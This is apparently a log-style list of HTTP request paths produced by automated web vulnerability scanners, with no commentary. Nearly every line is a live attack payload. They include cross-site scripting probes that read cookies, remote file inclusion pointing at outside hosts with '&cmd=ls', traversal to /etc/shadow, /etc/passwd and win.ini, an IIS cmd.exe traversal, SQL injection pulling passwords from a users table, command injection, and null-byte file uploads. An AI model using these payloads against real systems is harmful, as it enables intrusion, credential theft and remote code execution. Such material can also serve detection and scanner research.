/g8nu2yy7.php?<script>cross_site_scripting.nasl</script>
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php&frm_user=q83452335&scr_height=&scr_width=
/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
/examples/servlets/servlet/search.php?searchstring=<script>foo</script>
/aj3pf49c.idc?<script>document.cookie="testnofv=4170;"</script>
/quagynka.jsp?<script>cross_site_scripting.nasl</script>
/ao22ww7y.nsf?<script>document.cookie="testqppc=8767;"</script>
/i686v90l.cfc?<script>document.cookie="testfutf=1550;"</script>
/d765w06j.exe?<script>cross_site_scripting.nasl</script>
/script>
/nyvbv05h.idc?<script>document.cookie="testftxz=5980;"</script>
/vmi8bb12.cfc?<script>document.cookie="testlerc=2575;"</script>
/8t9v8k7x.htm?<script>document.cookie="testhvje=9403;"</script>
/3m5knyc4.cfm?<script>document.cookie="testbgqj=6434;"</script>
/..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}
/script/tick/allincludefortick.php?path_to_code=http://192.168.202.118:8080/ghl9il?
/zuihld5m.nsf?<script>cross_site_scripting.nasl</script>
/bl8sefdm.dll?<script>cross_site_scripting.nasl</script>
/b4vng02k.dll?<script>document.cookie="testtrlh=3672;"</script>
/3hlysl2x.dll?<script>document.cookie="testgjbe=8505;"</script>
/zroo33l4.do?<script>document.cookie="testiklc=904;"</script>
/script/menu/menuprincipal.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm?
/6dlc2zm9.cgi?<script>document.cookie="testqpux=4016;"</script>
/n1afe1y6.php?<script>cross_site_scripting.nasl</script>
/j4rdyhw8.do?<script>document.cookie="testrluj=1420;"</script>
/tukodz3j.php?<script>cross_site_scripting.nasl</script>
/j2kdmfw4.pl?<script>cross_site_scripting.nasl</script>
/t3af3tdz.dll?<script>cross_site_scripting.nasl</script>
/oie504mr.fts?<script>document.cookie="testtpby=7052;"</script>
/e9rx3ya4.do?<script>cross_site_scripting.nasl</script>
/vmi8bb12.idc?<script>document.cookie="testlerc=2575;"</script>
/ewc3rz1l.exe?<script>document.cookie="testkgqo=204;"</script>
/#0#/#0#(123)})</script>
/weq93ppb.fts?<script>cross_site_scripting.nasl</script>
/orangehrm/lib/controllers/CentralController.php?leavecode=Leave&action=Leave_Type_Summary??allCheck=on&txtLeaveTypeName%5b%5d=Medical&id%5b%5d=LTY002&btnAdd.x=1&btnAdd.y=1
/iktok2bw.htm?<script>cross_site_scripting.nasl</script>
/manager/nessus"><script>alert('mod_perl_status_uri_xss.nasl')</script>
/recordings/index.php?search='><script>alert('autoindex_search_xss.nasl');</script>&searchmode=f
/i2n4v4rl.nsf?<script>cross_site_scripting.nasl</script>
/administrator/components/com_feederator/includes/tmsp/subscription.php?globalsmosconfig_absolute_path=http://192.168.202.96:8080/txenjrxf3?
/3m5knyc4.cgi?<script>document.cookie="testbgqj=6434;"</script>
/i2n4v4rl.php?<script>cross_site_scripting.nasl</script>
/addvip.php?msetstr"progsdir"=http://192.168.202.96:8080/no4ghqiguzhst?
/fpnpp5zg.nsf?<script>document.cookie="testyias=101;"</script>
/sc</script>ript>
/eg2u8pbv.idc?<script>cross_site_scripting.nasl</script>
/jackrabbit/search.jsp?q=%"<script>alert(1331909235)</script>
/7uz3ok60.htm?<script>cross_site_scripting.nasl</script>
/bxnyrhmh.php3?<script>document.cookie="testmjct=1867;"</script>
/h5sc3gxy.exe?<script>cross_site_scripting.nasl</script>
/bemarket/postscript/postscript.php?p_mode=http://192.168.202.118:8080/ghl9il?
/m4kkjf8l.pl?<script>document.cookie="testyglc=8988;"</script>
/y8pmygrp.php?<script>cross_site_scripting.nasl</script>
/d44uk9h2.nsf?<script>document.cookie="testmybc=2088;"</script>
/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f=x.tan.phpinfo()&t=png&title=http://192.168.202.118:8080/ghl9il?
/e9rx3ya4.html?<script>cross_site_scripting.nasl</script>
/examples/jsp/jsp2/el/nessus"><script>alert('mod_perl_status_uri_xss.nasl')</script>
/'(^'%2b)/)1)</script>
/editprojectissue.do?projectissueid="><script>alert(414225590327)</script><"
/?<script>document.cookie="testlerc=2575;"</script>
/scripts/search.jsp?q=%"<script>alert(1331904373)</script>
/l752x1ry.jspa?<script>cross_site_scripting.nasl</script>
/t3af3tdz.jsp?<script>cross_site_scripting.nasl</script>
/pxagj7n7.jspa?<script>cross_site_scripting.nasl</script>
/manager/index.php?sensor_program=<script>alert('phpsysinfo_multiple_xss.nasl');</script>
/l4fz1dqw.fts?<script>cross_site_scripting.nasl</script>
/uvazfs7p.cgi?<script>document.cookie="testwtbo=4831;"</script>
/7u1pb2xi.fts?<script>document.cookie="testlwwz=718;"</script>
/bzuf9ozq.x?<script>cross_site_scripting.nasl</script>
/w4996nr0.dll?<script>document.cookie="testttvs=7163;"</script>
/vjbrrppi.php3?<script>cross_site_scripting.nasl</script>
/onmouseover='\u0061lert(1)'>%00
/**/$($){_/**/setter=$,_=1}}).$=alert</script>
/supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('vulnerable')</script>&lt;/script&gt;
/upload.php?type=\"<script>alert(document.cookie)</script>
/g8nu2yy7.fts?<script>cross_site_scripting.nasl</script>
/en-us/oie504mr.jsp?<script>document.cookie="testtpby=7052;"</script>
/82q7ywa8.cfm?<script>document.cookie="testpwew=1315;"</script>
/vac1l5vm.dll?<script>cross_site_scripting.nasl</script>
/?<script>document.cookie="testyrbs=2855;"</script>
/1r8cfrlf.x?<script>document.cookie="testydan=5106;"</script>
/jw64yq8u.html?<script>document.cookie="testylfu=1313;"</script>
/script>
/h5sc3gxy.fts?<script>cross_site_scripting.nasl</script>
/fpnpp5zg.exe?<script>document.cookie="testyias=101;"</script>
/script>
/sys/code/box.inc.php?config"sipssys"=http://192.168.202.96:8080/4dckqcc0acprbz?
/edzaia0i.html?<script>cross_site_scripting.nasl</script>
//<body><script/src="http://www.example.com/test?rnd=q96795255"></script>
/examples/jsp/jsp2/jspx/item.fts?href="><script>alert("ftgate_44002.nasl")</script>;
/xsqln7eb.mscgi?<script>document.cookie="testpcbb=9254;"</script>
/33y9gcqq.nsf?<script>document.cookie="testnvxc=4301;"</script>
/0z575z74.kspx?<script>document.cookie="testuhsv=9753;"</script>
/igtf0zon.cgi?<script>cross_site_scripting.nasl</script>
/uvazfs7p.cfm?<script>document.cookie="testwtbo=4831;"</script>
/scriptpath/footers.php?tinybb_footers=http://192.168.202.96:8080/no4ghqiguzhst?
/qczkquis.kspx?<script>document.cookie="testkwlg=5591;"</script>
/nyjgaorz.php?<script>cross_site_scripting.nasl</script>
/8x6w469u.cfm?<script>document.cookie="testgfjr=1286;"</script>
/script/template/index.php?main_page_directory=http://192.168.202.118:8080/tzhfyzkbomspvm?
/1/&#41</script>
/examples/jsp/error/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>
/admin/index.php?path_to_script=http://192.168.202.118:8080/tzhfyzkbomspvm??&cmd=ls
/<script>alert('vulnerable')</script>.jsp
/en-us/<script>cross_site_scripting.nasl</script>.htm
/1r8cfrlf.mscgi?<script>document.cookie="testydan=5106;"</script>
/iisadmpwd/..\xc0/..\xc0/..\xc0/..\xc0/..\xc0/../winnt/system32/cmd.exe?/c+dir+c:\+/og
/iktok2bw.cgi?<script>cross_site_scripting.nasl</script>
/examples/jsp/colors/viewcvs.cgi/?cvsroot=<script>foo</script>
/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosconfig_absolute_path=http://192.168.202.118:8080/ghl9il?
/d7ktpmcq.php?<script>cross_site_scripting.nasl</script>
/student.asp?msg=<script>alert("411666083443");</script>
/cgi-bin/search.jsp?q=%"<script>alert(1331908697)</script>
/jackrabbit/search.jsp?q=%"<script>alert(1332008324)</script>
/ewc3rz1l.mscgi?<script>document.cookie="testkgqo=204;"</script>
/zqqemp6j.jsp?<script>cross_site_scripting.nasl</script>
/t3af3tdz.pl?<script>cross_site_scripting.nasl</script>
/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.118:8080/zz5thkvtmlgl?
/phpmyadmin/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904405')</script>
/script/ident/ident.inc.php?path_inc=http://192.168.202.118:8080/ghl9il?
/examples/servlets/servlet/search.jsp?q=%"<script>alert(1331904373)</script>
/yacs/scripts/update_trailer.php?contextpath_to_root=http://192.168.202.118:8080/zz5thkvtmlgl??
/3m5knyc4.idc?<script>document.cookie="testbgqj=6434;"</script>
/cgi-bin/search.jsp?q=%"<script>alert(1331908793)</script>
/odzk29aa.jspa?<script>document.cookie="testtfvh=2141;"</script>
/0rufe52p.exe?<script>cross_site_scripting.nasl</script>
/m2fpztty.pl?<script>cross_site_scripting.nasl</script>
/y8pmygrp.nsf?<script>cross_site_scripting.nasl</script>
/includes/phpdig/includes/config.php?relative_script_path=http://192.168.202.96:8080/4dckqcc0acprbz?
/ao22ww7y.cfm?<script>document.cookie="testqppc=8767;"</script>
/hipkz026.mscgi?<script>document.cookie="testyrbs=2855;"</script>
/examples/jsp/checkbox/snpfiltered.pl?t=c&u=<script>foo</script>
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+00+00+10+00+00+00+20+00+00+00+02+00+00+00+16+00+00+00+00+00+00+00+00+00++>>esbq
/<script>document.cookie="testbnli=1975;"</script>
/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.118:8080/iroy1gvqrrqu?
/weq93ppb.php3?<script>cross_site_scripting.nasl</script>
/j4drbkil.asp?<script>cross_site_scripting.nasl</script>
/ewc3rz1l.cfm?<script>document.cookie="testkgqo=204;"</script>
/7uz3ok60.jspa?<script>cross_site_scripting.nasl</script>
/bl8sefdm.mscgi?<script>cross_site_scripting.nasl</script>
/modules/submit/index.php?op=pre&title=<script>alert(document.cookie);</script>
/search.aspx?keywords=<script>alert("413385588094")</script>
/**/union%a0select/**/1,pass,3`a`from`users`
/edv3mapy.cgi?<script>cross_site_scripting.nasl</script>
/recordings/user.cgi?url="><script>alert("gossamer_links_url_xss.nasl");</script>&from=add
/script>
/3hlysl2x.cfc?<script>document.cookie="testgjbe=8505;"</script>
/0z575z74.do?<script>document.cookie="testuhsv=9753;"</script>
/include/scripts/run_auto_suspend.cron.php?dir=http://192.168.202.118:8080/2aibfaczmac8?
/shopcustadmin.asp?msg=<script>alert(414515596905)</script>
/comments.php?scriptpath=http://192.168.202.96:8080/txenjrxf3??
/bemarket/postscript/postscript.php?p_mode=http://192.168.202.96:8080/txenjrxf3?
/oie504mr.cgi?<script>document.cookie="testtpby=7052;"</script>
/zv8tv7h8.pl?<script>document.cookie="testcqwz=9752;"</script>
/script>
/script/menu/menuprincipal.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp?
/mod_membre/inscription.php?chemin=http://192.168.202.118:8080/2aibfaczmac8??
/sdk/../../../../../../../etc/vmware/hostd/vminventory.xml
/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm?command=fileupload&type=file&currentfolder=/z.jsp\x00
/ywaxntrx.dll?<script>cross_site_scripting.nasl</script>
/nyvbv05h.exe?<script>document.cookie="testftxz=5980;"</script>
/admin/news.admin.php?path_to_script=http://192.168.202.118:8080/tzhfyzkbomspvm??&cmd=ls
/html;alert(1)/*,<svg%20onload=eval(unescape(location))><title>*/;alert(2);function%20text(){};function%20html(){}
/7u1pb2xi.nsf?<script>document.cookie="testlwwz=718;"</script>
/webtools/bonsai/cvsblame.cgi?file=<script>alert('vulnerable')</script>
/javascript">javascript:alert(1);</script>
/zuihld5m.html?<script>cross_site_scripting.nasl</script>
/netutils/findata.stm?user=<script>alert(document.cookie)</script>
/zv8tv7h8.html?<script>document.cookie="testcqwz=9752;"</script>
/*
/fa8p8lr8.htm?<script>cross_site_scripting.nasl</script>
/scr</script>ipt>
/script_path/installation/index.php?mosconfig_absolute_path=http://192.168.202.118:8080/tzhfyzkbomspvm??
/phpmyadmin/search.php?searchstring=<script>foo</script>
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+02+00+00+00+18+00+00+00+00+00+00+00+00+00+00+00+00+00+00+40+00+00+c0+00++>>esbq
/m5103snj.idc?<script>cross_site_scripting.nasl</script>
/phpbb/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>
/b1q8bywu.kspx?<script>cross_site_scripting.nasl</script>
/jsp-examples/cal/cal2.jsp?time=8am<script>alert("tomcat_sample_cal2_xss.nasl")</script>
/servlet/msgpage?action=test&msg=<script>alert('vulnerable')</script>
/module/forum/forum.php?fd=http://192.168.202.96:8080/4dckqcc0acprbz?=';
/if69ddo1.jsp?<script>document.cookie="testiabz=5220;"</script>
/1r8cfrlf.idc?<script>document.cookie="testydan=5106;"</script>
/script>
/egaet53a.fts?<script>cross_site_scripting.nasl</script>
/path_script/createurl.php?formurl=http://192.168.202.96:8080/llumt7msyau5y?
/odzk29aa.exe?<script>document.cookie="testtfvh=2141;"</script>
/aj3pf49c.cgi?<script>document.cookie="testnofv=4170;"</script>
/vmi8bb12.nsf?<script>document.cookie="testlerc=2575;"</script>
/b5xdqgz2.mscgi?<script>cross_site_scripting.nasl</script>
/administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script>
/script/menu/menuprincipal.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8?
/d7ktpmcq.fts?<script>cross_site_scripting.nasl</script>
/n9xlumt5.aspx?<script>cross_site_scripting.nasl</script>
/3hlysl2x.nsf?<script>document.cookie="testgjbe=8505;"</script>
/20040209_transcript/
/5qnlm5z2.kspx?<script>document.cookie="testsixi=8451;"</script>
/script>
/cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('vulnerable')</script>&branch=head
/script>
/manager/server.pt?open=space&name=";}</script><script>alert('plumtree_name_xss.nasl')</script>
/en-us/i686v90l.cfm?<script>document.cookie="testfutf=1550;"</script>
//
/en-us/33y9gcqq.kspx?<script>document.cookie="testnvxc=4301;"</script>
/../../../../../../../../../../etc/shadow
/zln2hm2z.aspx?<script>document.cookie="testblcp=8120;"</script>
/h21y8w52.mscgi?<script>cross_site_scripting.nasl</script>
/orangehrm/lib/controllers/CentralController.php?id=USR003&uniqcode=USR&isAdmin=No??txtUserConfirmPassword=&cmbUserEmpID=002&cmbUserGroupID=0&txtUserEmpID=002+-+user&cmbUserStatus=Enabled&sqlState=&txtUserName=user2&txtUserPassword=&txtUserID=USR003
/w4996nr0.jspa?<script>document.cookie="testttvs=7163;"</script>
/script%3E|
/vhzmaia2.php?<script>document.cookie="testkogj=3979;"</script>
/gvx7m5ti.mscgi?<script>document.cookie="testwldz=3506;"</script>
/l752x1ry.aspx?<script>cross_site_scripting.nasl</script>
/script>
/t7tm4m0b.mscgi?<script>cross_site_scripting.nasl</script>
/bl8sefdm.cfm?<script>cross_site_scripting.nasl</script>
/admin/index.php?path_to_script=http://192.168.202.118:8080/zz5thkvtmlgl??&cmd=ls
/vac1l5vm.jsp?<script>cross_site_scripting.nasl</script>
/demo/ms-pe02/catalog.php?cid=0&sid='"&sortfield=title&sortorder=asc&pagenumber=1&main=http://192.168.202.118:8080/moclyxlwqyfjnp?&
/nyvbv05h.php3?<script>document.cookie="testftxz=5980;"</script>
/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.118:8080/tzhfyzkbomspvm?
/r3le3om5.html?<script>cross_site_scripting.nasl</script>
/antispam/listdel?file=whitelist&name=a<script>alert('vulnerable')</script>&startline=0(naturally)
/x7pclv4s.cfm?<script>document.cookie="testiulz=3709;"</script>
/zln2hm2z.x?<script>document.cookie="testblcp=8120;"</script>
/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28^%27%2b%29/%291%29}};xhr.send%28%29;%3C/script%3E
/script>
/user.cgi?url="><script>alert("gossamer_links_url_xss.nasl");</script>&from=add
/examples/jsp/colors/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script>
/administrator/components/com_feederator/includes/tmsp/subscription.php?globalsmosconfig_absolute_path=http://192.168.202.118:8080/ghl9il?
/scripts/sitemap.scr.php?globalspthclasses=http://192.168.202.96:8080/4dckqcc0acprbz??
/scripts/search.jsp?q=%"<script>alert(1331909171)</script>
/<script>document.cookie="testyglc=8988;"</script>
/nyjgaorz.jsp?<script>cross_site_scripting.nasl</script>
/<script>document.cookie="testlihk=7070;"</script>
/*
/fpnpp5zg.asp?<script>document.cookie="testyias=101;"</script>
/xfkun1ku.htm?<script>cross_site_scripting.nasl</script>
/6wb70v0b.do?<script>cross_site_scripting.nasl</script>
/0z575z74.idc?<script>document.cookie="testuhsv=9753;"</script>
/?<script>document.cookie="testsory=7676;"</script>
/hrttz9fj.html?<script>document.cookie="testtbjy=7334;"</script>
/cgi-bin/index.php?search='><script>alert('autoindex_search_xss.nasl');</script>&searchmode=f
/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
/zoomstats/libs/dbmax/mysql.php?globals'lib''db''path'=http://192.168.202.118:8080/ghl9il??
/en-us/w4996nr0.jsp?<script>document.cookie="testttvs=7163;"</script>
/azcrfs8d.idc?<script>document.cookie="testjpdr=9205;"</script>
/cmsimple2_7/cmsimple/cms.php?pth'file''config'=http://192.168.202.118:8080/moclyxlwqyfjnp??
/i2n4v4rl.do?<script>cross_site_scripting.nasl</script>
/en-us/w4996nr0.cfm?<script>document.cookie="testttvs=7163;"</script>
/0qhcnefz.exe?<script>cross_site_scripting.nasl</script>
/examples/jsp/num/error.php?selected_theme=<script>alert(uebimiau_selected_theme_xss.nasl)</script>
/fcgi-bin/echo?foo=<script>alert('vulnerable')</script>
/dslpwt15.html?<script>document.cookie="testtkio=5454;"</script>
/fpnpp5zg.kspx?<script>document.cookie="testyias=101;"</script>
/g8nu2yy7.php3?<script>cross_site_scripting.nasl</script>
/demo/ms-pe02/catalog.php?cid=0&sid='"&sortfield=title&sortorder=asc&pagenumber=1&main=http://192.168.202.118:8080/zz5thkvtmlgl?&
/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.96:8080/no4ghqiguzhst?\x00
/en-us/account/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331909287')</script>
/script>
/<script>document.cookie="testlerc=2575;"</script>
/igtf0zon.htm?<script>cross_site_scripting.nasl</script>
//%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
/manager/forumdisplay.php?fid=21"><script>x</script>
/pxagj7n7.php3?<script>cross_site_scripting.nasl</script>
/examples/servlets/servlet/index.php?module=<script>foo</script>
/demo/ms-pe02/catalog.php?cid=0&sid='"&sortfield=title&sortorder=asc&pagenumber=1&main=http://cirt.net/rfiinc.txt?&
/examples/jsp/errorsearch-results.dot?search_query=nessus"><script>alert('dotcms_search_query_xss.nasl')</script>/
/vmi8bb12.cfm?<script>document.cookie="testlerc=2575;"</script>
/hipkz026.dll?<script>document.cookie="testyrbs=2855;"</script>
/iktok2bw.html?<script>cross_site_scripting.nasl</script>
/script>
/u95h6ymu.kspx?<script>document.cookie="testkhwc=4028;"</script>
/8x6w469u.idc?<script>document.cookie="testgfjr=1286;"</script>
/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/swgnhpydbq0t?\x00
/g8nu2yy7.x?<script>cross_site_scripting.nasl</script>
/fc9t54l7.cgi?<script>document.cookie="testggad=2000;"</script>
/script>
/ny1b3qq4.kspx?<script>cross_site_scripting.nasl</script>
/weq93ppb.htm?<script>cross_site_scripting.nasl</script>
/scripts/xtextarea.scr.php?globalspthspaw=@rfiurl?globalspthspaw=@rfiurl?
//</script>alert(1)//%></script>
/vmi8bb12.aspx?<script>document.cookie="testlerc=2575;"</script>
/?<script>document.cookie="testiklc=904;"</script>
/zqqemp6j.nsf?<script>cross_site_scripting.nasl</script>
/zroo33l4.aspx?<script>document.cookie="testiklc=904;"</script>
/jnt3f86c.jspa?<script>document.cookie="testcmax=9270;"</script>
/*&midast;&sol;confirm(3)&sol;&sol;*/</script></svg>
/6n7aacgg.jsp?<script>cross_site_scripting.nasl</script>
/t578vqea.nsf?<script>document.cookie="testsory=7676;"</script>
/javascript">javascript:alert(1);</script>
/examples/servlets/servlet/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>
/en-us/s7qus4g3.cgi?<script>cross_site_scripting.nasl</script>
/newsarchive.php?path_to_script=http://192.168.202.118:8080/ghl9il??&cmd=ls
/cacti/index.php?cat_select=<script>foo</script>
/fpnpp5zg.jsp?<script>document.cookie="testyias=101;"</script>
/cacti/index.php?sensor_program=<script>alert('phpsysinfo_multiple_xss.nasl');</script>
/fa8p8lr8.dll?<script>cross_site_scripting.nasl</script>
/cgi-bin/search.jsp?q=%"<script>alert(1331918979)</script>
/fc9t54l7.cfm?<script>document.cookie="testggad=2000;"</script>
/examples/jsp/error/snpfiltered.pl?t=c&u=<script>foo</script>
/en-us/<script>cross_site_scripting.nasl</script>.do
/s7qus4g3.do?<script>cross_site_scripting.nasl</script>
/edv3mapy.jsp?<script>cross_site_scripting.nasl</script>
/cgi-bin/index.php?module=<script>foo</script>
/admin/news.admin.php?path_to_script=http://192.168.202.118:8080/moclyxlwqyfjnp??&cmd=ls
/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script>
/j734qobz.asp?<script>cross_site_scripting.nasl</script>
/vhzmaia2.htm?<script>document.cookie="testkogj=3979;"</script>
/0qhcnefz.jspa?<script>cross_site_scripting.nasl</script>
/netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script>
/?<script>document.cookie="testqppc=8767;"</script>
/webtop/wdk/samples/dumprequest.jsp?j=<script>alert('vulnerable');</script>f
/en-us/s7qus4g3.php?<script>cross_site_scripting.nasl</script>
/q703m78q.php3?<script>document.cookie="testvowq=604;"</script>
/7o5qp766.jsp?<script>cross_site_scripting.nasl</script>
/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.96:8080/4dckqcc0acprbz?\x00
/search.jsp?q=%"<script>alert(1331904224)</script>
/0rufe52p.dll?<script>cross_site_scripting.nasl</script>
/33y9gcqq.cfm?<script>document.cookie="testnvxc=4301;"</script>
/examples/jsp/calsearch-results.dot?search_query=nessus"><script>alert('dotcms_search_query_xss.nasl')</script>/
/t7tm4m0b.html?<script>cross_site_scripting.nasl</script>
/examples/jsp/checkbox/login.php?course="><script>alert(atutor_xss.nasl)</script>
/vac1l5vm.aspx?<script>cross_site_scripting.nasl</script>
/scripts/rss.scr.php?globalspthclasses=http://192.168.202.118:8080/moclyxlwqyfjnp??
/b4vng02k.exe?<script>document.cookie="testtrlh=3672;"</script>
/d44uk9h2.jspa?<script>document.cookie="testmybc=2088;"</script>
/nmw0do67.kspx?<script>cross_site_scripting.nasl</script>
/cgi-bin/pbcgi.cgi?name=joe\xcamel&email=<script>alert('vulnerable');</script>
/apavxugx.nsf?<script>document.cookie="testdnbh=5237;"</script>
/csconm/servlet/login/login.jsp?url=csconm/servlet/com.cisco.core.mice.main?command=</script><script>alert(document.cookie)</script>
/recordings/nessus"><script>alert('django_admin_xss.nasl')</script>/
/j2kdmfw4.kspx?<script>cross_site_scripting.nasl</script>
/script>
/en-us/accountsearch-results.dot?search_query=nessus"><script>alert('dotcms_search_query_xss.nasl')</script>/
/scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.118:8080/zz5thkvtmlgl?
/n9xlumt5.cgi?<script>cross_site_scripting.nasl</script>
/en-us/w4996nr0.fts?<script>document.cookie="testttvs=7163;"</script>
/pxagj7n7.htm?<script>cross_site_scripting.nasl</script>
/scripts/xtextarea.scr.php?globalspthspaw=http://cirt.net/rfiinc.txt??
/recordings/forumdisplay.php?fid=21"><script>x</script>
/egaet53a.nsf?<script>cross_site_scripting.nasl</script>
/qb2xy9aw.html?<script>cross_site_scripting.nasl</script>
/l752x1ry.kspx?<script>cross_site_scripting.nasl</script>
/o1zj4u9v.jsp?<script>document.cookie="testabrn=6368;"</script>
/8x6w469u.htm?<script>document.cookie="testgfjr=1286;"</script>
/copatranscript_20061023/
/5qnlm5z2.htm?<script>document.cookie="testsixi=8451;"</script>
/o6ebbirj.do?<script>cross_site_scripting.nasl</script>
/scriptpath/footers.php?tinybb_footers=http://192.168.202.118:8080/iroy1gvqrrqu?
/SCRIPT>#
/<script>document.cookie="testabrn=6368;"</script>
/scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331908729
/scs86g1p.php3?<script>document.cookie="testquyx=2820;"</script>
/en-us/i686v90l.exe?<script>document.cookie="testfutf=1550;"</script>
/169okeyj.fts?<script>document.cookie="testxeoi=3573;"</script>
/en-us/w4996nr0.x?<script>document.cookie="testttvs=7163;"</script>
/en-us/s7qus4g3.aspx?<script>cross_site_scripting.nasl</script>
//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
/en-us/dda2qr7j.aspx?<script>cross_site_scripting.nasl</script>
/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.96:8080/swgnhpydbq0t?\x00
/esmozg5d.jsp?<script>cross_site_scripting.nasl</script>
/ao22ww7y.asp?<script>document.cookie="testqppc=8767;"</script>
/sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script>
/l4fz1dqw.asp?<script>cross_site_scripting.nasl</script>
/3m5knyc4.php?<script>document.cookie="testbgqj=6434;"</script>
/t3af3tdz.htm?<script>cross_site_scripting.nasl</script>
/main.php?frm_daynight=q35497679&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php%3flogout%3d1&frm_user=&scr_height=&scr_width=
/zmvq66jy.mscgi?<script>cross_site_scripting.nasl</script>
//
/examples/jsp/checkbox/forum_2.php?msg=10&return=<script>foo</script>
/zln2hm2z.dll?<script>document.cookie="testblcp=8120;"</script>
/d44uk9h2.fts?<script>document.cookie="testmybc=2088;"</script>
/javascript/.passwd.jsp
/<script>document.cookie="testylik=3403;"</script>
/javascript">javascript:alert(1);</script>
/%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
/qhvu0pdg.php?<script>document.cookie="testchuc=2100;"</script>
//<body><script/src="http://www.example.com/test?rnd=q54714766"></script>
/ap58k3ci.html?<script>cross_site_scripting.nasl</script>
/l4fz1dqw.jspa?<script>cross_site_scripting.nasl</script>
/scripts/lom_update.php?etcdir=http://192.168.202.118:8080/tzhfyzkbomspvm?
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+e0+00+8e+81+0b+01+02+19+00+02+00+00+00+04+00+00+00+00+00+00+00+10+00+00++>>esbq
/n1afe1y6.nsf?<script>cross_site_scripting.nasl</script>
/script/init/createallimagecache.php?path_to_code=http://192.168.202.118:8080/tzhfyzkbomspvm?
/j4rdyhw8.jsp?<script>document.cookie="testrluj=1420;"</script>
/?<script>document.cookie="testftxz=5980;"</script>
/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.96:8080/4dckqcc0acprbz?
/d7ktpmcq.exe?<script>cross_site_scripting.nasl</script>
/x2gyorli.nsf?<script>document.cookie="testwhac=3130;"</script>
/5o9zq43e.fts?<script>cross_site_scripting.nasl</script>
/*
/<script>alert('vulnerable')</script>.shtml
/hjdzm96v.x?<script>document.cookie="testbyqe=7474;"</script>
/rpxyx07v.cfm?<script>document.cookie="testbnli=1975;"</script>
/o35zot2r.idc?<script>cross_site_scripting.nasl</script>
/ht8pn8uq.cfc?<script>cross_site_scripting.nasl</script>
/manager/index.php?cat_select=<script>foo</script>
/h5i6crm3.php3?<script>document.cookie="testlihk=7070;"</script>
/script/template/index.php?main_page_directory=http://192.168.202.96:8080/4dckqcc0acprbz?
/en-us/esmozg5d.cfc?<script>cross_site_scripting.nasl</script>
/manager/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>
/o6ebbirj.php?<script>cross_site_scripting.nasl</script>
/en-us/odzk29aa.x?<script>document.cookie="testtfvh=2141;"</script>
/path_script/createurl.php?formurl=http://192.168.202.118:8080/iroy1gvqrrqu?
/lmw4r201.aspx?<script>document.cookie="testwews=8477;"</script>
/?<script>document.cookie="testzgnm=1183;"</script>
/jsp-examples/jsp2/jspx/textrotate.jspx?name=<script>alert(111)</script>
/xlj7h65o.nsf?<script>document.cookie="testtbbe=856;"</script>
/inc/download_center_lite.inc.php?script_root=http://192.168.202.118:8080/ghl9il?
/b4vng02k.html?<script>document.cookie="testtrlh=3672;"</script>
/ht8pn8uq.do?<script>cross_site_scripting.nasl</script>
//../../../../../../../../windows/win.ini\x00en
/vhzmaia2.aspx?<script>document.cookie="testkogj=3979;"</script>
/5o9zq43e.kspx?<script>cross_site_scripting.nasl</script>
/8t9v8k7x.pl?<script>document.cookie="testhvje=9403;"</script>
/m4kkjf8l.mscgi?<script>document.cookie="testyglc=8988;"</script>
/examples/jsp/cal/forumdisplay.php?fid=21"><script>x</script>
/aj3pf49c.do?<script>document.cookie="testnofv=4170;"</script>
/azcrfs8d.jspa?<script>document.cookie="testjpdr=9205;"</script>
/fmnveedu.x?<script>document.cookie="testgfbr=7014;"</script>
/l4fz1dqw.mscgi?<script>cross_site_scripting.nasl</script>
/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.118:8080/2aibfaczmac8?\x00
